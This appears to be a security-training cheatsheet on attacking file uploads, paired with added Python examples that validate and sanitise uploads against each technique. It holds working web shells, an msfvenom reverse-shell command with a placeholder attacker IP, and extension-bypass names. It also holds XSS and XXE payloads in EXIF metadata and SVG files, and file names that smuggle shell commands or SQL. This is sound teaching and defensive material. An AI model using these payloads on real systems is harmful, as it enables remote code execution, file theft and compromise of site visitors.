File Uploads
WebShells
One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell. SecLists provides a plethora of web shells for different frameworks and languages.
Cheatsheet

| Web Shell | Description |
| --- | --- |
| <?php file_get_contents('/etc/passwd'); ?> | Basic PHP File Read |
| <?php system('hostname'); ?> | Basic PHP Command Execution |
| <?php system($_REQUEST['cmd']); ?> | Basic PHP Web Shell |
| <% eval request('cmd') %> | Basic ASP Web Shell |
| msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php | Generate PHP reverse shell |

PHP Web Shell
PHP Reverse Shell
List of Web Shells and Reverse Shells
Bypasses

Client-Side Bypass

| Command | Description |
| --- | --- |
| [CTRL+SHIFT+C] | Toggle Page Inspector |

Blacklist Bypass

| Command | Description |
| --- | --- |
| shell.phtml | Uncommon Extension |
| shell.pHp | Case Manipulation |
| List of PHP Extensions | |
| List of ASP Extensions | |
| List of Web Extensions | |

Whitelist Bypass

| Command | Description |
| --- | --- |
| shell.jpg.php | Double Extension |
| shell.php.jpg | Reverse Double Extension |
| %20, %0a, %00, %0d0a, /, .\, ., … | Character Injection - Before/After Extension |

Content/Type Bypass

| Command | Description |
| --- | --- |
| List of Web Content-Types | |
| List of All Content-Types | |
| List of File Signatures/Magic Bytes | |
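Seen from the defending side, the bypass rows above all target checks that are written as blacklists, that look at the wrong extension, or that trust the client's Content-Type. The Python below is an added example, not code from the original page, of an upload validator that closes those gaps together: an allowlist of extensions, a filename pattern that permits exactly one extension, a Content-Type and file-signature check tied to that extension, and a server-chosen storage name. The image-only use case, the ALLOWED table and the sample inputs are assumptions made for this example.

```python
import re
import secrets
from dataclasses import dataclass

# Assumption: an image-upload feature, so only image extensions are allowed.
# Everything else (.php, .phtml, .phar, .php5, ...) is rejected simply by not
# being listed; an allowlist has no "uncommon extension" to miss.
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}

# One base name of safe characters, exactly one dot, one extension. This single
# pattern rejects double extensions (shell.jpg.php, shell.php.jpg), path
# separators, spaces and the %00/%0a/%0d%0a bytes used for character injection,
# whether they arrive raw or still percent-encoded.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


@dataclass
class Verdict:
    ok: bool
    reason: str
    stored_name: str = ""


def validate_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    """Return whether the upload is accepted and the server-side name to store it under."""
    m = NAME_RE.fullmatch(filename)
    if not m:
        return Verdict(False, "filename is not a single base.ext name")
    ext = m.group(1).lower()            # shell.pHp and shell.PHP look the same here
    if ext not in ALLOWED:
        return Verdict(False, f"extension not allowed: {ext}")
    expected_type, magics = ALLOWED[ext]
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != expected_type:
        return Verdict(False, f"Content-Type {declared!r} does not match extension")
    # Magic bytes are defence in depth only: a file can carry a GIF89a header and
    # still be PHP, so the extension allowlist and a non-executable upload
    # directory remain the controls that matter.
    if not data.startswith(magics):
        return Verdict(False, "file signature does not match extension")
    # Never keep the client's name on disk; a random name keeps attacker text
    # out of every later path, command and query.
    return Verdict(True, "accepted", f"{secrets.token_hex(16)}.{ext}")


# Constructed inputs mirroring the bypass rows above (not real uploads).
SAMPLES = [
    ("cat.jpg", "image/jpeg", b"\xff\xd8\xff\xe0JFIF"),
    ("shell.pHp", "image/jpeg", b"<?php"),
    ("shell.phtml", "application/x-httpd-php", b"<?php"),
    ("shell.jpg.php", "image/jpeg", b"\xff\xd8\xff"),
    ("shell.php.jpg", "image/jpeg", b"\xff\xd8\xff"),
    ("shell.php%00.jpg", "image/jpeg", b"\xff\xd8\xff"),
    ("fake.png", "image/png", b"GIF89a"),
]


def run_samples() -> list[tuple[str, bool, str]]:
    """Run every sample through the validator; returns (name, accepted, reason)."""
    results = []
    for name, ctype, data in SAMPLES:
        verdict = validate_upload(name, ctype, data)
        results.append((name, verdict.ok, verdict.reason))
    return results


if __name__ == "__main__":
    for name, ok, reason in run_samples():
        print(f"{'ACCEPT' if ok else 'REJECT':6} {name:20} {reason}")
```

Only cat.jpg is accepted; every other sample is refused by the first check it fails, which is the order a reviewer should expect: name shape, then extension, then declared type, then content. Storing the file outside the web root, or in a directory the web server will not execute, is the control that makes any remaining bypass harmless.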
XSS
Many file types may allow us to introduce a Stored XSS vulnerability to the web application by uploading maliciously crafted versions of them.

The most basic example is when a web application allows us to upload HTML files. Although HTML files won't allow us to execute server-side code (e.g., PHP), it would still be possible to embed JavaScript code within them to carry out an XSS or CSRF attack on whoever visits the uploaded HTML page.

We can include an XSS payload in one of the metadata parameters that accept raw text, like the Comment or Artist parameters, as follows:
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
exiftool HTB.jpg
...SNIP...
Comment : "><img src=1 onerror=alert(window.origin)>
XSS attacks can also be carried out with SVG images, along with several other attacks. Scalable Vector Graphics (SVG) images are XML-based, and they describe 2D vector graphics, which the browser renders into an image. For this reason, we can modify their XML data to include an XSS payload. For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert("window.origin");</script>
</svg>
XXE
With SVG images, we can also include malicious XML data to leak the source code of the web application, and other internal documents within the server. For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
We can also use XXE to read source code in PHP web applications:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
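The SVG XSS payload and the two XXE payloads above both ride on XML that a picture never needs: script elements and event-handler attributes on the one hand, a DOCTYPE carrying entity declarations on the other. The Python below is an added example, not code from the original page, of how a defender can refuse both before the file is stored, and of escaping EXIF text such as the Comment field at output time so the exiftool payload above stays text. The element and attribute lists and the sample documents are constructed for this example.

```python
import html
import xml.etree.ElementTree as ET

# Elements that make an SVG "active" in a browser rather than a static picture.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "set", "animate"}
# Attributes that can carry a javascript: URL.
URL_ATTRS = {"href", "xlink:href", "{http://www.w3.org/1999/xlink}href"}


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix: '{ns}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def check_svg(data: bytes) -> tuple[bool, str]:
    """Accept only a static <svg> document: no DOCTYPE, no script, no handlers."""
    head = data[:2048].lower()
    if b"<!doctype" in head or b"<!entity" in head:
        # Entity declarations live in the DOCTYPE; an uploaded picture never
        # needs one, so refuse it before any parser can resolve an entity.
        return False, "DOCTYPE/ENTITY declaration not allowed"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag) != "svg":
        return False, "root element is not <svg>"
    for el in root.iter():
        if _local(el.tag) in ACTIVE_TAGS:
            return False, f"active element <{_local(el.tag)}>"
        for attr, value in el.attrib.items():
            if _local(attr).startswith("on"):
                return False, f"event handler attribute {attr}"
            if attr.lower() in URL_ATTRS and value.strip().lower().startswith("javascript:"):
                return False, f"javascript: URL in {attr}"
    return True, "ok"


def render_metadata(field: str, value: str) -> str:
    """Escape EXIF Comment/Artist text at output time so it stays text."""
    return f"<dd>{html.escape(field)}: {html.escape(value)}</dd>"


# Constructed samples (not real uploads): a script-bearing SVG and the XXE
# document from the text, an event-handler variant, and a harmless picture.
SVG_SCRIPT = (b'<svg xmlns="http://www.w3.org/2000/svg"><rect x="1" y="1" width="1" height="1"/>'
              b'<script type="text/javascript">alert("window.origin");</script></svg>')
SVG_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><svg>&xxe;</svg>')
SVG_ONLOAD = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'
SVG_OK = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1" fill="green"/></svg>'


def demo() -> dict:
    """Run each sample through the checks; returns the verdicts by name."""
    return {
        "script": check_svg(SVG_SCRIPT),
        "xxe": check_svg(SVG_XXE),
        "onload": check_svg(SVG_ONLOAD),
        "ok": check_svg(SVG_OK),
        "comment": render_metadata("Comment", '"><img src=1 onerror=alert(window.origin)>'),
    }


if __name__ == "__main__":
    for key, result in demo().items():
        print(key, result)
```

Rejecting every DOCTYPE is deliberately blunter than trying to distinguish harmless external DTD references from internal entity subsets; the parser never sees the declaration, so its entity-handling defaults stop mattering. Even an SVG that passes should be served with Content-Disposition: attachment or from a separate origin, since a clean file today can be replaced by a different one tomorrow.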
Injections in File Name
For example, if we name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp), then our file name would inject the whoami command, which would get executed, giving us RCE.

Similarly, we may use an XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
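The three injections above share one root cause: the client-supplied file name reaches a shell, a page or a query as text. The Python below is an added example, not code from the original page, that keeps the name out of the command path entirely (a random server-side name, and an argument vector instead of a shell string) and binds it as a parameter in SQL. The vulnerable move command is reproduced only for contrast; UPLOAD_DIR and the sample names are constructed for this example.

```python
import re
import secrets
import shutil
import sqlite3
from pathlib import Path

UPLOAD_DIR = Path("/var/www/uploads")   # assumption: where accepted files are stored


def server_side_name(client_name: str) -> str:
    """Mint the name the file is stored under; the client's base name is discarded."""
    ext = Path(client_name).suffix.lower()
    if not re.fullmatch(r"\.[a-z0-9]{1,5}", ext):
        raise ValueError(f"unexpected extension {ext!r}")
    return secrets.token_hex(16) + ext


def move_command_unsafe(client_name: str, tmp_dir: str) -> str:
    """The pattern from the text: the name becomes part of a shell string."""
    return f"mv {tmp_dir}/{client_name} {UPLOAD_DIR}/"


def move_command(src: Path, dest: Path) -> list[str]:
    """Argument vector for subprocess.run(argv) with no shell: $(...), backticks and ||
    are ordinary characters to mv. '--' stops a name beginning with '-' acting as an option."""
    return ["mv", "--", str(src), str(dest)]


def store_upload(src: Path, client_name: str) -> Path:
    """What the application should actually call: pure Python, no shell at all."""
    dest = UPLOAD_DIR / server_side_name(client_name)
    shutil.move(str(src), str(dest))
    return dest


def record_upload(conn: sqlite3.Connection, client_name: str, stored_name: str) -> str:
    """Parameterised INSERT: a quote in the name is data, not SQL."""
    conn.execute("CREATE TABLE IF NOT EXISTS uploads (original TEXT, stored TEXT)")
    conn.execute("INSERT INTO uploads (original, stored) VALUES (?, ?)", (client_name, stored_name))
    row = conn.execute("SELECT original FROM uploads WHERE stored = ?", (stored_name,)).fetchone()
    return row[0]


# Constructed names taken from the text (not real uploads).
CMD_NAMES = ["file$(whoami).jpg", "file`whoami`.jpg", "file.jpg||whoami"]
SQL_NAME = "file';select+sleep(5);--.jpg"


def demo() -> dict:
    """Contrast the unsafe and safe handling of the sample names."""
    out = {}
    # Unsafe: every metacharacter survives into the command string.
    out["unsafe"] = [move_command_unsafe(n, "/tmp") for n in CMD_NAMES]
    # Safe: the stored name is random, so no client text is in argv at all.
    out["argv"] = [move_command(Path("/tmp/upload.tmp"), UPLOAD_DIR / server_side_name(n))
                   for n in CMD_NAMES[:2]]
    # file.jpg||whoami has no acceptable extension and is refused outright.
    try:
        server_side_name(CMD_NAMES[2])
        out["trailing"] = "accepted"
    except ValueError:
        out["trailing"] = "rejected"
    conn = sqlite3.connect(":memory:")
    out["sql"] = record_upload(conn, SQL_NAME, server_side_name(SQL_NAME))
    return out


if __name__ == "__main__":
    for key, result in demo().items():
        print(key, result)
```

For the XSS variant the same rule as for EXIF metadata applies: if the original name must be shown back to users, escape it with html.escape() at the point of rendering, and keep it in the database only as a display string, never as a path.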